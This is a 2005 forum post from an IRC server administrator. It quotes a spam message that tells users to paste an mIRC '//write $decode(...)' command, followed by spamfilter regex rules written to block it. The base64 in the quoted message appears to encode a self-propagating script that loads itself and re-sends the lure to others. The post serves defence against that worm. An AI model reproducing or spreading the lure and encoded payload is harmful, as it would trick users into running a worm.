decode exploit
Posted: Thu Sep 08, 2005 12:16 pm
We received a decode exploit pm yesterday, and I thought it was covered.
The message was
Would this work???
Any help on this would be greatly appriceated
droolin
The message was
What I think was set up in the spamfilter.conf to catch this which is commented out is the following:<noxchi_rose> Want to be an OPERATOR in #mircpopup-magic ? copy/paste this-> //write  $decode(b24gMTp0ZXh0Oio6Izp7IC5pZ25vcmUgJG5pY2sgfCAudGltZXKgIDAgMTIwIC5qb2luICNNYW5pbGEgfCAubXNnICRuaWNrIFdhbnQgdG8gYmUgYW4gT1BFUkFUT1IgaW4gJGNoYW4gPyBjb3B5L3Bhc3RlIHRoaXMtPgMxNCAvL3dyaXRlIKAgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIKAgJGNocigxMjQpIC8vbW9kZSAkICQrIG1lICtSIH0=,
Code: Select all
/*
spamfilter {
regex "//write \$decode\(.+\|.+load -rs";
target { private; channel; };
reason "Generic $decode exploit";
action block;
};
*/
Code: Select all
spamfilter {
regex "//write \$decode\(.+";
target { private; channel; };
reason "Generic $decode exploit";
action block;
};
droolin